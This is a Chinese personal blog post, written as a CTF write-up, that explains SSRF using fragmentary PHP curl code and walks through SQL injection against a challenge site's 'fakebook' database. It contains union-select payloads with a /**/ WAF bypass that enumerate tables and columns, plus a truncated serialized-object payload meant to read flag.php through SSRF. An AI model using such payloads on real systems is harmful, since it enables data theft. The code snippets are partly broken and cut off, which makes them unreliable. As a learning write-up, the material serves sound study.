被監督寫部落格 Day4

2021-10-10 01:44:10 字數 2106 閱讀 5201

ssrf

一些函式表示:

//建立乙個curl資源

$ch

=curl_init()

;

//設定url和相應的選項

);//設定成0表示將返回的內容直接輸出,若是1或者true則是直接儲存不輸出

//抓取url並傳給瀏覽器

curl_exec

($ch

);

//關閉curl系統,並釋放系統資源

curl_close

($ch

);

public

function isvalidblog (

)(\:[0-9]+)?(\/\s*)?$/i"

,$blog);

}//在blog處存在過濾

並且get函式中存在ssrf漏洞

function

get(

$url

)curl_close

($ch);

return

$output

;}

(ssrf:

概念:服務端請求偽造(server-side request forgery),指的是攻擊者在未能取得伺服器所有權限時,利用伺服器漏洞以伺服器的身份傳送一條構造好的請求給伺服器所在內網。ssrf攻擊通常針對外部網路無法直接訪問的內部系統。

原理:利用存在缺陷的web應用作為**攻擊遠端和本地的伺服器。一般情況下, ssrf攻擊的目標是外網無法訪問的內部系統,黑客可以利用ssrf漏洞獲取內部系統的一些資訊(正是因為它是由服務端發起的,所以它能夠請求到與它相連而與外網隔離的內部系統)。ssrf形成的原因大都是由於服務端提供了從其他伺服器應用獲取資料的功能且沒有對目標位址做過濾與限制。

漏洞利用:利用file協議讀取本地敏感檔案)

註冊乙個賬號,使用者名稱可以開啟,發現引數no,發現存在sql注入

判斷字段數,5時候報錯,有4個

經過測試發現要繞過waf,用/**/

找到注入點(這裡注意要將no的引數改一下,我的理解是如果是1的話只能是將變數儲存而不能輸出,所以要改為0,不然頁面上並沒有回顯)

爆表名是facebook

爆表名,是users

?no=0/**/union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+
爆列名

?no=0/**/union/**/select 1,group_concat(table_name),3,4 from information_schema.columns where table_schema='fakebook' and table_name='users'--+
查資料

data處反序列化

用ssrf漏洞讀取flag.php

payload:

?no=0%20union/**/select%201,2,3,'o:8:"userinfo":3:'--+
在原始碼中訪問鏈結找到fla

被監督寫部落格 Day6

今天做的這道題也不是很難,就是在做題的時候需要聯絡一些函式的功能,先記錄一下這些函式 scandir 可以掃瞄當前目錄下的檔案 localeconv 返回一包含本地數字及貨幣格式資訊的陣列 array reverse 以相反的元素順序返回陣列 array flip 交換陣列的鍵和值 array ra...

衝刺部落格Day4

成員昨天已完成的工作 今天計畫完成的工作 工作中遇到的困難 周訊超接上後台登入介面進行測試 完成隨心貼模組 無林佳浩 模組後端開發 隨心貼模組 的完成 暫時沒有 黃欣茵了解前後端互動 實現背景介面 使用者介面不美觀,沒有吸引力 江男輝模組基本設計完成 學習新功能所需要的編碼 需要對前端有一點的了解 ...

scrum衝刺部落格 day4

第四篇scrum衝刺部落格 2.工作情況 隊員昨天已完成的工作 今天計畫完成的工作 工作中遇到的困難 陳嘉喜用j a進行位址的構建,供網頁端使用 解決新增不了使用者的問題 未遇到謝曉嵐 時刻警戒.yml檔案對其他部分的bug的影響 今天的工作與我無關 未遇到宋鯤寶 完成第三篇衝刺部落格和畫燃盡圖,簽...